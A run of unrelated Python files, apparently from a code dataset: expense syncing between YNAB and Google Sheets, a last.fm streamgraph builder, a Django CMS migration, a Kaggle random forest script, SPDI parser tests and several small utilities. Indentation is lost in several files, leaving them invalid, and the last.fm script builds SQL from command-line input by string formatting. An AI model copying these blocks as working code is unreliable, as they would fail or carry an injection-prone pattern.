yc = YnabClient(YNAB_CLIENT_KEY)
all_transactions = yc.get_transaction(budget_id=YNAB_BUDGET_ID)
column_names = ['timestamp', 'payee', 'memo', 'flag', 'amount']
listofitems = []
for item in all_transactions:
listofitems.append(str(item.date) + ',,,' +
str(item.payee_name) + ',,,' +
str(item.memo) + ',,,' +
str(item.flag_color) + ',,,' +
str(item.amount)
)
ynab_df = pd.Series(listofitems).str.split(',,,', expand=True)
ynab_df.columns = column_names
ynab_df.timestamp = pd.to_datetime(ynab_df.timestamp)
ynab_df.amount = ynab_df.amount.astype(int) / -1000
ynab_df_filter = (
ynab_df[(ynab_df.timestamp >= since_date) &
(ynab_df.flag.isin(['red', 'purple']))]
)
ret_df = pd.DataFrame(columns = ['Timestamp', 'Payee',
'Amount', 'Purpose',
'Description'])
ret_df.Timestamp = ynab_df_filter.timestamp.astype(str) + ' 00:00:00'
ret_df.Payee = 'Ryder'
ret_df.Amount = ynab_df_filter.amount.round(0).astype(int).astype(str)
    # red flags map to 'for us'; purple flags map to 'for you'
ret_df.Purpose = (ynab_df_filter.flag.apply(lambda x:
'for us' if x == 'red' else 'for you' if x == 'purple' else '-1'))
ret_df.Description = (
(ynab_df_filter.payee + ' - ' + ynab_df_filter.memo)
.str.replace(' - None', '')
)
return(ret_df)
def get_expenses_from_google(sh=sh, since_date='1900-01-01'):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
        sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
                                str(sh.worksheets()[sheetnum])).group(0)
        if curr_sheet.shape[1] != 5:
            raise Exception(f'Worksheet {sheet_title} (index {sheetnum}) has the '
                            f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
since_date_datetime = datetime.datetime.strptime(since_date, '%Y-%m-%d')
ret_expenses_from_google = (
all_sheets
.loc[all_sheets.Timestamp >= since_date_datetime]
.sort_values('Timestamp', ascending = False)
)
ret_expenses_from_google.Timestamp = (
ret_expenses_from_google.Timestamp.astype(str)
)
return(ret_expenses_from_google)
#%%
def get_new_ynab_expenses_to_upload():
# Get most recent date from Google expenses
since_date=get_last_trns_date(format='string')
# Get most recent Google shared expenses
recent_from_gs = get_expenses_from_google(since_date=since_date)
# Get my recent YNAB expenses
recent_from_ynab = get_trans_from_ynab(since_date=since_date)
# Set operation: return only those YNAB expenses NOT also in Google sheets
in_ynab_not_google = (
recent_from_ynab.merge(recent_from_gs, how = 'left', indicator = True)
.query('_merge == \'left_only\'')
.drop('_merge', 1)
)
return(in_ynab_not_google)
#%%
def append_to_expenses_sheet(expenses_to_upload):
print('')
print(expenses_to_upload)
print('')
this_month = sh.worksheet('index', 0)
while True:
decision = input('Upload to Expenses Tracker? y/n >> ')
if decision[0].lower() == 'y':
print('')
for index, row in expenses_to_upload.iterrows():
row_list = [row.Timestamp, row.Payee, row.Amount,
row.Purpose, row.Description]
this_month.append_table(row_list)
print(f'Appending ${float(row.Amount):.0f} - {row.Description} to tracker.')
print(f'\nUploaded ${expenses_to_upload.Amount.astype(float).sum():.0f} ' \
f'over {expenses_to_upload.shape[0]} transactions.')
break
elif decision[0].lower() == 'n':
print('Not entering.')
break
else:
print(f'Did not understand entry ({decision}). Try again.')
def archive_sheet_and_clear(sheet=sh):
w = load_and_process_sheet(sh, tab=0)
date_max = w.Timestamp.max().strftime('%m/%d/%Y')
date_min = w.Timestamp.min().strftime('%m/%d')
tab_title = date_min + '-' + date_max
wks = sh.worksheet('index', 0)
sh.add_worksheet(tab_title, src_worksheet=wks)
wks.clear(start='A3')
def show_spender_information(sheet=sh):
w_df = load_and_process_sheet(sheet, tab=0)
spender_list = w_df.Payee.unique()
amounts_list = []
for i, name in enumerate(spender_list):
total_shared_transactions_amt = w_df[w_df.Purpose == 'for us'].sum()
        spenders_shared_transactions_amt = (
            w_df[(w_df.Payee == name) & (w_df.Purpose == 'for us')]
        )
print(total_shared_transactions_amt)
|
python
|
name = 'omnifig'
long_name = 'omni-fig'
version = '0.6.3'
url = 'https://github.com/felixludos/omni-fig'
description = 'Universal configuration system for common execution environments'
author = 'Felix Leeb'
author_email = '[email protected]'
license = 'MIT'
readme = 'README.rst'
packages = ['omnifig']
import os
try:
with open(os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(__file__))), 'requirements.txt'), 'r') as f:
install_requires = f.readlines()
except:
install_requires = ['pyyaml', 'C3Linearize', 'omnibelt']
del os
entry_points = {'console_scripts': 'fig = omnifig.top:entry'}
|
python
|
import sys
import dataset
from datetime import datetime
from dateutil.rrule import rrule, MONTHLY
from dateutil.relativedelta import relativedelta
def process(username, metric, stream_limit):
# gets all artists and their respective daily play counts
db = dataset.connect('sqlite:///last-fm.db')
total = db[username].count()
    timeframe = next(db.query('SELECT MIN(timestamp), MAX(timestamp) FROM %s' % username))
mintime = datetime.fromtimestamp(timeframe['MIN(timestamp)'])
maxtime = datetime.fromtimestamp(timeframe['MAX(timestamp)'])
timeframe = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=maxtime)])
sql = 'SELECT DISTINCT {0} FROM {1} GROUP BY {0}, play_year, play_month HAVING count({0}) > {2}'.format(metric, username, stream_limit)
result = db.query(sql)
artists = []
for row in result:
artists.append(row[metric])
artists = '(%s)' % str(artists)[1:-1]
sql = 'SELECT {0}, timestamp, count({0}) FROM {1} GROUP BY {0}, play_year, play_month HAVING {0} IN {2}'.format(metric, username, artists)
result = db.query(sql)
streams = {}
for row in result:
artist = row[metric]
if artist not in streams:
streams[artist] = [0 for i in range(timeframe)]
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams[artist][elapsed - 1] == 0:
streams[artist][elapsed - 1] = row['count(%s)' % metric]
else:
streams[artist][elapsed] = row['count(%s)' % metric]
    # the optional third CLI argument (after username and scrobble minimum) enables the "other" bucket
    if len(sys.argv) > 3 and sys.argv[3] == '--other':
sql = 'SELECT COUNT(*) AS count, timestamp FROM {0} WHERE {1} NOT IN {2} GROUP BY play_year, play_month'.format(username, metric, artists)
result = db.query(sql)
streams['other'] = [0 for i in range(timeframe)]
for row in result:
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams['other'][elapsed - 1] == 0:
streams['other'][elapsed - 1] = row['count']
elif elapsed != len(streams):
streams['other'][elapsed] = row['count']
with open('scrobble-streamgraph/stream-data.csv', 'w') as csv:
csv.write('key,value,date\n')
for i in range(timeframe):
current = mintime + relativedelta(months=i)
for artist in streams:
try:
csv.write('%s,%s,%s\n' % (artist.replace(',', ''), streams[artist][i], '%s/01/%s' % (current.month, str(current.year)[2:])))
except UnicodeEncodeError:
pass
if __name__ == '__main__':
try:
user = sys.argv[1]
except IndexError:
print("[ERROR] No last.fm username specified.")
quit()
try:
stream_limit = sys.argv[2]
except IndexError:
print("[ERROR] No scrobble minimum specified.")
quit()
try:
int(stream_limit)
except ValueError:
print("[ERROR] Scrobble minimum must be an integer.")
quit()
metric = 'artist'
    process(user, metric, stream_limit)
|
python
|
import requests
from datetime import datetime
aq = []
def scrap():
url = "http://vc8006.pythonanywhere.com/api/"
response = requests.request("GET", url)
r = response.json()
for i in range(1,31):
aq.append(r[-i]['AQI'])
# print(r[-i])
# print(response.text)
print(aq)
scrap()
|
python
|
import gym
from griddly import GymWrapperFactory
from griddly.RenderTools import RenderToFile
if __name__ == '__main__':
# A nice tool to save png images
file_renderer = RenderToFile()
# This is what to use if you want to use OpenAI gym environments
wrapper = GymWrapperFactory()
# There are two levels here
level = 0
wrapper.build_gym_from_yaml('GameOfLife', 'game-of-life.yaml', level=level)
# Create the Environment
    env = gym.make('GDY-GameOfLife-v0')
observation = env.reset()
file_renderer.render(observation, f'sokoban-level-{level}.png')
|
python
|
# Generated by Django 2.2.15 on 2020-08-04 19:14
import aldryn_apphooks_config.fields
import app_data.fields
import cms.models.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import djangocms_blog.models
import djangocms_text_ckeditor.fields
import filer.fields.image
import parler.fields
import parler.models
import sortedm2m.fields
import taggit_autosuggest.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('taggit', '0003_taggeditem_add_unique_index'),
('filer', '0011_auto_20190418_0137'),
('sites', '0002_alter_domain_unique'),
migrations.swappable_dependency(settings.FILER_IMAGE_MODEL),
('cms', '0022_auto_20180620_1551'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created at')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='modified at')),
],
options={
'verbose_name': 'blog category',
'verbose_name_plural': 'blog categories',
},
bases=(djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=100, verbose_name='Type')),
('namespace', models.CharField(default=None, max_length=100, unique=True, verbose_name='Instance namespace')),
('app_data', app_data.fields.AppDataField(default='{}', editable=False)),
],
options={
'verbose_name': 'blog config',
'verbose_name_plural': 'blog configs',
},
bases=(parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='last modified')),
('date_published', models.DateTimeField(blank=True, null=True, verbose_name='published since')),
('date_published_end', models.DateTimeField(blank=True, null=True, verbose_name='published until')),
('date_featured', models.DateTimeField(blank=True, null=True, verbose_name='featured date')),
('publish', models.BooleanField(default=False, verbose_name='publish')),
('enable_comments', models.BooleanField(default=True, verbose_name='enable comments on post')),
('enable_liveblog', models.BooleanField(default=False, verbose_name='enable liveblog on post')),
('amount', models.CharField(choices=[('R50', 'R50'), ('R100', 'R100'), ('R150', 'R150'), ('R200', 'R200')], default='R50', max_length=200)),
('goal', models.CharField(choices=[('R30 000', 'R30 000'), ('R50 000', 'R50 000'), ('R100 000', 'R100 000'), ('R200 000', 'R200 000')], default='R30 000', max_length=200)),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='djangocms_blog_post_author', to=settings.AUTH_USER_MODEL, verbose_name='author')),
('categories', models.ManyToManyField(blank=True, related_name='blog_posts', to='djangocms_blog.BlogCategory', verbose_name='category')),
('content', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='post_content', slotname='post_content', to='cms.Placeholder')),
('liveblog', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='live_blog', slotname='live_blog', to='cms.Placeholder')),
('main_image', filer.fields.image.FilerImageField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_image', to=settings.FILER_IMAGE_MODEL, verbose_name='main image')),
('main_image_full', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_full', to='filer.ThumbnailOption', verbose_name='main image full')),
('main_image_thumbnail', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_thumbnail', to='filer.ThumbnailOption', verbose_name='main image thumbnail')),
('media', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='media', slotname='media', to='cms.Placeholder')),
('related', sortedm2m.fields.SortedManyToManyField(blank=True, help_text=None, to='djangocms_blog.Post', verbose_name='Related Posts')),
('sites', models.ManyToManyField(blank=True, help_text='Select sites in which to show the post. If none is set it will be visible in all the configured sites.', to='sites.Site', verbose_name='Site(s)')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', related_name='djangocms_blog_tags', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
options={
'verbose_name': 'blog article',
'verbose_name_plural': 'blog articles',
'ordering': ('-date_published', '-date_created'),
'get_latest_by': 'date_published',
},
bases=(djangocms_blog.models.KnockerModel, djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='LatestPostsPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_latestpostsplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of latests articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('categories', models.ManyToManyField(blank=True, help_text='Show only the blog articles tagged with chosen categories.', to='djangocms_blog.BlogCategory', verbose_name='filter by category')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='Show only the blog articles tagged with chosen tags.', related_name='djangocms_blog_latest_post', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='filter by tag')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='GenericBlogPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_genericblogplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.AddField(
model_name='blogcategory',
name='app_config',
field=aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config'),
),
migrations.AddField(
model_name='blogcategory',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='djangocms_blog.BlogCategory', verbose_name='parent'),
),
migrations.CreateModel(
name='AuthorEntriesPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_authorentriesplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of author articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('authors', models.ManyToManyField(limit_choices_to={'djangocms_blog_post_author__publish': True}, to=settings.AUTH_USER_MODEL, verbose_name='authors')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='PostTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('title', models.CharField(max_length=752, verbose_name='title')),
('slug', models.SlugField(allow_unicode=True, blank=True, max_length=752, verbose_name='slug')),
('subtitle', models.CharField(blank=True, default='', max_length=767, verbose_name='subtitle')),
('abstract', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='abstract')),
('meta_description', models.TextField(blank=True, default='', verbose_name='post meta description')),
('meta_keywords', models.TextField(blank=True, default='', verbose_name='post meta keywords')),
('meta_title', models.CharField(blank=True, default='', help_text='used in title tag and social sharing', max_length=2000, verbose_name='post meta title')),
('post_text', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='text')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.Post')),
],
options={
'verbose_name': 'blog article Translation',
'db_table': 'djangocms_blog_post_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfigTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('app_title', models.CharField(max_length=234, verbose_name='application title')),
('object_name', models.CharField(default='Article', max_length=234, verbose_name='object name')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogConfig')),
],
options={
'verbose_name': 'blog config Translation',
'db_table': 'djangocms_blog_blogconfig_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogCategoryTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('name', models.CharField(max_length=752, verbose_name='name')),
('slug', models.SlugField(blank=True, max_length=752, verbose_name='slug')),
('meta_description', models.TextField(blank=True, default='', verbose_name='category meta description')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogCategory')),
],
options={
'verbose_name': 'blog category Translation',
'db_table': 'djangocms_blog_blogcategory_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
]
|
python
|
import pandas as pd
import numpy as np
import ml_metrics as metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.calibration import CalibratedClassifierCV
from sklearn.cross_validation import StratifiedKFold
from sklearn.metrics import log_loss
path = '../Data/'
print("read training data")
train = pd.read_csv(path+"train_tfidf.csv")
label = train['target']
trainID = train['id']
del train['id']
del train['target']
tsne = pd.read_csv(path+'tfidf_train_tsne.csv')
train = train.join(tsne)
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(train.values, label)
print("read test data")
test = pd.read_csv(path+"test_tfidf.csv")
ID = test['id']
del test['id']
tsne = pd.read_csv(path+'tfidf_test_tsne.csv')
test = test.join(tsne)
clf_probs = iso_clf.predict_proba(test.values)
sample = pd.read_csv(path+'sampleSubmission.csv')
print("writing submission data")
submission = pd.DataFrame(clf_probs, index=ID, columns=sample.columns[1:])
submission.to_csv(path+"rf_tfidf.csv",index_label='id')
# retrain
sample = pd.read_csv(path+'sampleSubmission.csv')
submission = pd.DataFrame(index=trainID, columns=sample.columns[1:])
nfold=5
skf = StratifiedKFold(label, nfold, random_state=131)
score = np.zeros(nfold)
i=0
for tr, te in skf:
X_train, X_test, y_train, y_test = train.values[tr], train.values[te], label[tr], label[te]
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(X_train, y_train)
pred = iso_clf.predict_proba(X_test)
tmp = pd.DataFrame(pred, columns=sample.columns[1:])
submission.iloc[te] = pred
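    # out-of-fold predictions accumulated here feed the overall log-loss
    # estimate printed after the loop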
    score[i] = log_loss(y_test, pred, eps=1e-15, normalize=True)
    print(score[i])
    i += 1
print("ave: " + str(np.average(score)) + " stddev: " + str(np.std(score)))
# cv 10, 0.475277 + 0.00974157
# nfold 5: 0.48047625 + 0.0114040
# nfold 3: 0.4870385 + 0.0059006
print(log_loss(label, submission.values, eps=1e-15, normalize=True))
submission.to_csv(path+"rf_tfidf_retrain.csv",index_label='id')
|
python
|
import pytest
from mutalyzer_spdi_parser.convert import to_hgvs_internal_model, to_spdi_model
TESTS_SET = [
(
"NG_012337.3:10:C:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "C",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"deleted": [{"sequence": "C", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:1:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 1,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::T",
{
"seq_id": "NG_012337.3",
"position": 10,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:0:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 0,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:CT:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
}
],
},
),
(
"NG_012337.3:10:CT:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::",
{
"seq_id": "NG_012337.3",
"position": 10,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [
{
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"source": "reference",
}
],
}
],
},
),
(
"NP_003997.1:1:M:RSTV",
{
"seq_id": "NP_003997.1",
"position": 1,
"deleted_sequence": "M",
"inserted_sequence": "RSTV",
},
{
"type": "description_dna",
"reference": {"id": "NP_003997.1"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 1},
"end": {"type": "point", "position": 2},
},
"deleted": [{"sequence": "M", "source": "description"}],
"inserted": [{"sequence": "RSTV", "source": "description"}],
}
],
},
),
(
"NM_003002.2:273:g:u",
{
"seq_id": "NM_003002.2",
"position": 273,
"deleted_sequence": "g",
"inserted_sequence": "u",
},
{
"type": "description_dna",
"reference": {"id": "NM_003002.2"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 273},
"end": {"type": "point", "position": 274},
},
"deleted": [{"sequence": "g", "source": "description"}],
"inserted": [{"sequence": "u", "source": "description"}],
}
],
},
),
]
@pytest.mark.parametrize(
"description, model",
[(t[0], t[1]) for t in TESTS_SET],
)
def test_to_spdi_model(description, model):
assert to_spdi_model(description) == model
@pytest.mark.parametrize(
"description, model",
[(t[0], t[2]) for t in TESTS_SET],
)
def test_to_hgvs_internal_model(description, model):
assert to_hgvs_internal_model(description) == model
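# Direct-call sketch using the first case from TESTS_SET above:
#   to_spdi_model("NG_012337.3:10:C:T")
#   # -> {"seq_id": "NG_012337.3", "position": 10,
#   #     "deleted_sequence": "C", "inserted_sequence": "T"}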
|
python
|
"""
Licensed Materials - Property of IBM
Restricted Materials of IBM
20190891
© Copyright IBM Corp. 2021 All Rights Reserved.
"""
"""
Module to where fusion algorithms are implemented.
"""
import logging
import numpy as np
from ibmfl.aggregator.fusion.iter_avg_fusion_handler import \
IterAvgFusionHandler
logger = logging.getLogger(__name__)
class RLFusionHandler(IterAvgFusionHandler):
"""
Class for weight based Federated Averaging aggregation.
In this class, the simple averaging aggregation is performed over the RL
policy model weights.
"""
def __init__(self, hyperparams, protocol_handler,
fl_model=None,
data_handler=None,
**kwargs):
super().__init__(hyperparams,
protocol_handler,
data_handler,
fl_model,
**kwargs)
self.name = "RLAvgFusion"
def fusion_collected_responses(self, lst_model_updates):
"""
        Receives a list of model updates, where a model update is of the type
        `ModelUpdate`. Using the weights included in each model update, it
        finds the mean of the weights per layer (indicated by key).
        :param lst_model_updates: List of model updates of type `ModelUpdate` \
        to be averaged.
        :type lst_model_updates: `list`
:return: results after aggregation
:rtype: `dict`
"""
weights = dict()
# Key list gives layers of the neural network
weights_key_list = list(lst_model_updates[0].get('weights').keys())
        # Iterate through the layers of the neural network
for key in weights_key_list:
w = []
for update in lst_model_updates:
w.append(np.array(update.get('weights').get(key)))
avg_weight = np.mean(np.array(w), axis=0)
weights[key] = avg_weight
return weights
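# Illustrative sketch (not part of the original class; plain dicts stand in for
# real `ModelUpdate` objects) of the per-layer averaging performed above:
#   _updates = [{"weights": {"dense": [1.0, 2.0]}},
#               {"weights": {"dense": [3.0, 4.0]}}]
#   _avg = {k: np.mean([np.array(u["weights"][k]) for u in _updates], axis=0)
#           for k in _updates[0]["weights"]}
#   # _avg["dense"] -> array([2., 3.])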
|
python
|
from lark import Tree
from copy import deepcopy
from .values import Value, ValueType
from .symbols import Symbol, Symbols
from .debug import DebugOutput
from .converters import get_symbol_name_from_key_item, get_array_index_exp_token_from_key_item
from . import blocks
from . import expressions
class Key():
def __init__(self, token: Tree, current_block):
self.key_items = []
for key_item in token.children:
symbol_name = get_symbol_name_from_key_item(key_item)
array_index_exp_token = get_array_index_exp_token_from_key_item(
key_item)
if array_index_exp_token:
array_index_exp = expressions.Expression(
array_index_exp_token, current_block)
else:
array_index_exp = None
key_item = {
"symbol_name": symbol_name,
"array_index_exp": array_index_exp,
}
self.key_items.append(key_item)
self.current_block = current_block
def get_value(self) -> Value:
value = self.__search_recursively()
return deepcopy(value)
def set_value(self, value: Value):
key_value = self.__search_recursively()
key_value.assign_value(value)
def set_value_in_python(self, value_in_python):
value = self.__search_recursively()
value.assign_value_in_python(value_in_python)
def __search_recursively(self) -> Value:
# Do one level only here
# Fixme
value = None
block = self.current_block
for key_item in self.key_items:
symbol_name = key_item['symbol_name']
array_index_exp = key_item['array_index_exp']
symbol = block.search_symbol_by_name_recursively(symbol_name)
if not symbol:
return None
if array_index_exp:
value = symbol.value.value_in_python[int(array_index_exp.get_value().value_in_python)]
else:
value = symbol.value
if not isinstance(value.value_type, blocks.TypeBlock):
break
else:
block = value.value_in_python
return value
def debug_output(self):
DebugOutput.output_block_attr("key")
DebugOutput.increase_depth()
DebugOutput.output(self.key_items)
DebugOutput.decrease_depth()
|
python
|
numero = int(input('Enter your number: '))
x = 0
while x <= numero:
    if x % 2 == 0:
        print(x)
    x = x + 1
|
python
|
